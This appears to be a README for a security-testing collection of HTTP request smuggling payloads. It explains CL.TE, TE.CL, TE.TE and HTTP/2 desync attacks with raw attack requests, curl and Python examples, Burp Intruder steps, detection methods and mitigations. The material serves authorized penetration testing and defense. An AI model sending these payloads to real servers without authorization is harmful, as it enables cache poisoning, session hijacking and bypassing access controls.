A comprehensive collection of HTTP Request Smuggling payloads for security testing and research.
About β’ Vulnerability Types β’ Payload Categories β’ Usage β’ References
- About
- What is HTTP Request Smuggling?
- Vulnerability Types
- Payload Categories
- Installation
- Usage
- Burp Suite Integration
- Testing Methodology
- Detection Techniques
- Mitigation
- Contributing
- Disclaimer
- References
- License
This repository contains a comprehensive collection of HTTP Request Smuggling payloads designed for security testing, penetration testing, and vulnerability research. All payloads are organized in categories and ready to be used with Burp Suite Intruder and other security testing tools.
β
732+ Unique Payloads - Extensive collection covering all major techniques
β
Categorized & Organized - Easy to find the right payload for your test case
β
Burp Suite Ready - Pre-formatted for Intruder attacks
β
HTTP/1.1 & HTTP/2 - Support for both protocol versions
β
Real-world Examples - Based on actual vulnerabilities and research
β
Regular Updates - Continuously updated with new techniques
HTTP Request Smuggling is a critical web security vulnerability that exploits inconsistencies in how front-end and back-end servers parse HTTP request boundaries. When the front-end server (like a proxy, load balancer, or CDN) and back-end server disagree on where one request ends and another begins, attackers can:
- Bypass security controls (WAFs, authentication, access controls)
- Poison web caches with malicious content
- Hijack user sessions and credentials
- Execute stored XSS attacks
- Gain unauthorized access to internal systems
Client β Front-End Server β Back-End Server
- Attacker sends an ambiguous HTTP request
- Front-end interprets it as one request
- Back-end interprets it as two requests
- Second request gets prepended to the next legitimate user's request
- Attacker can manipulate other users' requests
Front-end uses Content-Length, back-end uses Transfer-Encoding: chunked
Attack Vector:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLEDFront-end uses Transfer-Encoding: chunked, back-end uses Content-Length
Attack Vector:
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4
5c
GPOST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 15
x=1
0Both servers support Transfer-Encoding, but can be tricked with obfuscation
Attack Vector:
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Transfer-Encoding: x
0
GET /404 HTTP/1.1
X: YCommon Obfuscation Techniques:
Transfer-Encoding: chunked(extra space)Transfer-encoding: chunked(case variation)Transfer-Encoding : chunked(space before colon)Transfer-Encoding: chunked(trailing space)Transfer-Encoding:[tab]chunked(tab character)Transfer-Encoding: xchunkedTransfer-Encoding: chunked, identity
HTTP/2 to HTTP/1.1 downgrade vulnerabilities
Attack Vector:
POST / HTTP/2
Host: vulnerable-website.com
Content-Length: 0
GET /admin HTTP/1.1
Host: vulnerable-website.com- File:
Intruder/Detection-Payloads.txt - Description: Basic payloads for detecting request smuggling vulnerabilities
- Use Case: Initial reconnaissance and vulnerability confirmation
- File:
Intruder/CL-TE-Payloads.txt - Description: Payloads targeting CL.TE vulnerabilities
- Use Case: Front-end uses Content-Length, back-end uses Transfer-Encoding
- File:
Intruder/TE-CL-Payloads.txt - Description: Payloads targeting TE.CL vulnerabilities
- Use Case: Front-end uses Transfer-Encoding, back-end uses Content-Length
- File:
Intruder/TE-TE-Payloads.txt - Description: Obfuscated Transfer-Encoding headers
- Use Case: Both servers process Transfer-Encoding differently
- File:
Intruder/Cache-Poisoning-Payloads.txt - Description: Payloads for web cache poisoning attacks
- Use Case: Poisoning CDN/proxy caches with malicious responses
- File:
Intruder/Session-Hijacking-Payloads.txt - Description: Payloads for capturing/hijacking user sessions
- Use Case: Stealing authentication tokens and session data
- File:
Intruder/Bypass-Payloads.txt - Description: Payloads for bypassing security controls
- Use Case: Accessing restricted endpoints, bypassing WAF/authentication
- File:
Intruder/HTTP2-Desync-Payloads.txt - Description: HTTP/2 downgrade and desynchronization attacks
- Use Case: HTTP/2 to HTTP/1.1 conversion vulnerabilities
- File:
Intruder/Advanced-Payloads.txt - Description: Complex multi-stage attacks and edge cases
- Use Case: Advanced exploitation scenarios
- File:
Intruder/Time-Based-Payloads.txt - Description: Time-delay based detection techniques
- Use Case: Blind detection when no direct feedback is available
git clone https://github.com/payload-box/http-request-smuggling-payloads.git
cd http-request-smuggling-payloads# Download all Intruder payloads
cd Intruder/
# Or download specific categories
wget https://raw.githubusercontent.com/payload-box/http-request-smuggling-payloads/main/Intruder/CL-TE-Payloads.txt- Detection Phase - Use
Detection-Payloads.txtto identify vulnerability - Vulnerability Type Identification - Determine CL.TE, TE.CL, or TE.TE
- Exploitation - Use category-specific payloads
- Impact Analysis - Test cache poisoning, session hijacking, etc.
# Using curl
curl -X POST https://target.com/ \
-H "Content-Length: 6" \
-H "Transfer-Encoding: chunked" \
-d "0\r\n\r\nX"
# Using Python
import requests
headers = {
'Content-Length': '6',
'Transfer-Encoding': 'chunked'
}
data = "0\r\n\r\nX"
response = requests.post('https://target.com/', headers=headers, data=data)-
Open Burp Suite and capture a request
-
Send to Intruder (Ctrl+I)
-
Configure Attack Type:
- Type:
SniperorBattering Ram - Position: Select the entire request body or specific headers
- Type:
-
Load Payloads:
- Go to Payloads tab
- Payload type:
Simple list - Click Load β Select payload file (e.g.,
CL-TE-Payloads.txt)
-
Configure Options:
- Redirections: Never follow redirections
- Grep: Add patterns to detect successful smuggling:
404 Not FoundUnrecognized method- Response time anomalies
-
Start Attack and analyze responses
- Send request to Repeater (Ctrl+R)
- Manually paste payloads from files
- Send twice to test if second request is affected
- Observe differences in response times, status codes, headers
Use specialized Burp extensions:
- HTTP Request Smuggler by PortSwigger
- Turbo Intruder for timing-based attacks
- Logger++ for detailed analysis
β Identify architecture (proxy/load balancer + backend)
β Determine HTTP version support (HTTP/1.1, HTTP/2)
β Check for Connection: keep-alive support
β Test if multiple requests can be pipelined
Technique 1: Time-based Detection
POST / HTTP/1.1
Host: target.com
Content-Length: 4
Transfer-Encoding: chunked
1
A
QSend this twice. If second request delays, smuggling is possible.
Technique 2: Differential Responses
POST / HTTP/1.1
Host: target.com
Content-Length: 44
Transfer-Encoding: chunked
0
GET /404 HTTP/1.1
X-Ignore: XIf you get a 404 response, smuggling succeeded.
Select appropriate payload category based on detection results:
- CL.TE β Use
CL-TE-Payloads.txt - TE.CL β Use
TE-CL-Payloads.txt - TE.TE β Use
TE-TE-Payloads.txt
Test for:
- β Bypassing front-end security controls
- β Cache poisoning (CDN/proxy)
- β Session hijacking
- β Request routing manipulation
- β Internal endpoint access
Send a payload with a timeout and measure response time:
POST / HTTP/1.1
Content-Length: 4
Transfer-Encoding: chunked
1
A
QIndicators:
- Second request delays by ~30 seconds
- Backend waits for remaining data
Inject a request to non-existent resource:
0
GET /doesnotexist HTTP/1.1
Foo: barIndicators:
- 404 response received
- Different status code than normal
Inject custom headers and check reflection:
0
GET / HTTP/1.1
X-Smuggled-Header: testIndicators:
- Custom header appears in logs
- Header reflected in response
Monitor connection behavior:
- Unexpected connection resets
- Connection kept alive when it shouldn't be
- Multiple responses for single request
- Disable HTTP/1.1 keep-alive on backend servers
- Normalize requests - ensure front-end and back-end parse identically
- Reject ambiguous requests - requests with both CL and TE
- Use HTTP/2 end-to-end (avoid downgrade)
- Update servers to latest versions with fixes
- Strict parsing - reject malformed requests
-
Configuration Review:
# Nginx - Disable HTTP/1.1 pipelining keepalive_requests 1; keepalive_timeout 0; # Apache - Disable keep-alive KeepAlive Off
-
Deploy WAF rules to detect smuggling patterns
-
Monitor logs for suspicious patterns:
- Malformed Content-Length
- Multiple Transfer-Encoding headers
- Unusual chunk sizes
-
Network segmentation - isolate front-end and back-end
Run detection payloads against your infrastructure:
# Test with detection payloads
python smuggler.py -u https://your-site.comContributions are welcome! Please follow these guidelines:
- Fork the repository
- Create a feature branch (
git checkout -b feature/new-payloads) - Add your payloads with proper categorization
- Test payloads in a controlled environment
- Commit changes (
git commit -am 'Add new CL.TE payloads') - Push to branch (
git push origin feature/new-payloads) - Create a Pull Request
- β Test payloads before submitting
- β Add description/comments for complex payloads
- β Categorize correctly
- β Follow existing format
- β Avoid duplicates
IMPORTANT LEGAL NOTICE
This repository is intended for:
- β Authorized security testing with explicit permission
- β Educational purposes and security research
- β Bug bounty programs within scope
- β Defensive security and protection
DO NOT:
- β Use against systems without authorization
- β Use for illegal activities
- β Use to cause harm or disruption
Legal Warning: Unauthorized access to computer systems is illegal under laws such as:
- Computer Fraud and Abuse Act (CFAA) - USA
- Computer Misuse Act - UK
- Cybercrime laws in various jurisdictions
The authors and contributors are NOT responsible for any misuse or damage caused by this repository. Users are solely responsible for ensuring their testing activities are legal and authorized.
By using this repository, you agree to:
- Obtain proper authorization before testing
- Comply with all applicable laws and regulations
- Use responsibly and ethically
- Take full responsibility for your actions
- HTTP Desync Attacks: Request Smuggling Reborn - James Kettle
- HTTP/2: The Sequel is Always Worse - James Kettle
- Browser-Powered Desync Attacks - James Kettle
- Practical HTTP Header Smuggling
- Burp Suite - Web vulnerability scanner
- HTTP Request Smuggler - Burp extension
- Smuggler.py - Python-based testing tool
- h2csmuggler - HTTP/2 smuggling tool
- CVE-2020-11724 - Nginx
- CVE-2020-5902 - F5 BIG-IP
- CVE-2019-16254 - Puma web server
- CVE-2019-9516 - HTTP/2 implementation issues
- RFC 7230 - HTTP/1.1 Message Syntax and Routing
- RFC 7540 - HTTP/2 Specification
- RFC 9112 - HTTP/1.1 (Updated 2022)
- PortSwigger Web Security Academy
- OWASP Testing Guide
- HackerOne Reports
- PentesterLab - Request Smuggling exercises
| Category | Payloads | Last Updated |
|---|---|---|
| Detection | 59 | 2026 |
| CL.TE | 102 | 2026 |
| TE.CL | 134 | 2026 |
| TE.TE | 134 | 2026 |
| Cache Poisoning | 20 | 2026 |
| Session Hijacking | 52 | 2026 |
| Bypass | 72 | 2026 |
| HTTP/2 | 55 | 2026 |
| Advanced | 64 | 2026 |
| Time-based | 40 | 2026 |
| TOTAL | 732+ | 2026 |
- Issues: GitHub Issues
- Discussions: GitHub Discussions
- Security: Report vulnerabilities responsibly
This project is licensed under the MIT License - see the LICENSE file for details.
MIT License
Copyright (c) 2026 Payload Box
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
If you find this repository useful, please consider giving it a star! β
Made with β€οΈ by security researchers, for security researchers